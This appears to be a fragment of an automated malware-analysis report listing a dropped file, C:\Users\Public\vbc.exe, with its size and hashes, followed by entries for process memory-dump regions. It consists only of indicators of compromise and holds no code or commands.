C:\Users\Public\vbc.exeFilesize
847KB
MD504c980db0dbdf3b2a2b93e02a1797754
SHA149046b40bba2937ff84dce8a63d8793279a64c43
SHA256bf53b54b9edea2783c305fa6d1fd87e298b4d4506c587068dd6e6dd268c80424
SHA51254cdc011152815d8950a832add0448927d25450d38cd1d079ebf8936d2229a9d4c757b88b4871ccfaa8c23f7708c3fe6f3f7b2ece9eae75c4820786e5af125db
-
\Users\Public\vbc.exeFilesize
847KB
MD504c980db0dbdf3b2a2b93e02a1797754
SHA149046b40bba2937ff84dce8a63d8793279a64c43
SHA256bf53b54b9edea2783c305fa6d1fd87e298b4d4506c587068dd6e6dd268c80424
SHA51254cdc011152815d8950a832add0448927d25450d38cd1d079ebf8936d2229a9d4c757b88b4871ccfaa8c23f7708c3fe6f3f7b2ece9eae75c4820786e5af125db
-
\Users\Public\vbc.exeFilesize
847KB
MD504c980db0dbdf3b2a2b93e02a1797754
SHA149046b40bba2937ff84dce8a63d8793279a64c43
SHA256bf53b54b9edea2783c305fa6d1fd87e298b4d4506c587068dd6e6dd268c80424
SHA51254cdc011152815d8950a832add0448927d25450d38cd1d079ebf8936d2229a9d4c757b88b4871ccfaa8c23f7708c3fe6f3f7b2ece9eae75c4820786e5af125db
-
\Users\Public\vbc.exeFilesize
847KB
MD504c980db0dbdf3b2a2b93e02a1797754
SHA149046b40bba2937ff84dce8a63d8793279a64c43
SHA256bf53b54b9edea2783c305fa6d1fd87e298b4d4506c587068dd6e6dd268c80424
SHA51254cdc011152815d8950a832add0448927d25450d38cd1d079ebf8936d2229a9d4c757b88b4871ccfaa8c23f7708c3fe6f3f7b2ece9eae75c4820786e5af125db
-
\Users\Public\vbc.exeFilesize
847KB
MD504c980db0dbdf3b2a2b93e02a1797754
SHA149046b40bba2937ff84dce8a63d8793279a64c43
SHA256bf53b54b9edea2783c305fa6d1fd87e298b4d4506c587068dd6e6dd268c80424
SHA51254cdc011152815d8950a832add0448927d25450d38cd1d079ebf8936d2229a9d4c757b88b4871ccfaa8c23f7708c3fe6f3f7b2ece9eae75c4820786e5af125db
-
\Users\Public\vbc.exeFilesize
847KB
MD504c980db0dbdf3b2a2b93e02a1797754
SHA149046b40bba2937ff84dce8a63d8793279a64c43
SHA256bf53b54b9edea2783c305fa6d1fd87e298b4d4506c587068dd6e6dd268c80424
SHA51254cdc011152815d8950a832add0448927d25450d38cd1d079ebf8936d2229a9d4c757b88b4871ccfaa8c23f7708c3fe6f3f7b2ece9eae75c4820786e5af125db
-
memory/1612-172-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/1612-173-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/1612-184-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/1612-179-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/1612-178-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/1612-175-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/1612-169-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/1612-170-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/1612-171-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/1612-174-0x000000007EFDE000-0x000000007EFDF000-memory.dmpFilesize
4KB
-
memory/1756-155-0x00000000003E0000-0x00000000003F6000-memory.dmpFilesize
88KB
-
memory/1756-156-0x0000000004DD0000-0x0000000004E10000-memory.dmpFilesize
256KB
-
memory/1756-164-0x0000000000720000-0x0000000000742000-memory.dmpFilesize
136KB
-
memory/1756-161-0x0000000004DD0000-0x0000000004E10000-memory.dmpFilesize
256KB
-
memory/1756-162-0x0000000000570000-0x000000000057C000-memory.dmpFilesize
48KB
-
memory/1756-163-0x00000000077F0000-0x0000000007898000-memory.dmpFilesize
672KB
-
memory/1756-153-0x0000000000110000-0x00000000001EA000-memory.dmpFilesize
872KB
-
memory/2016-54-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2016-211-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB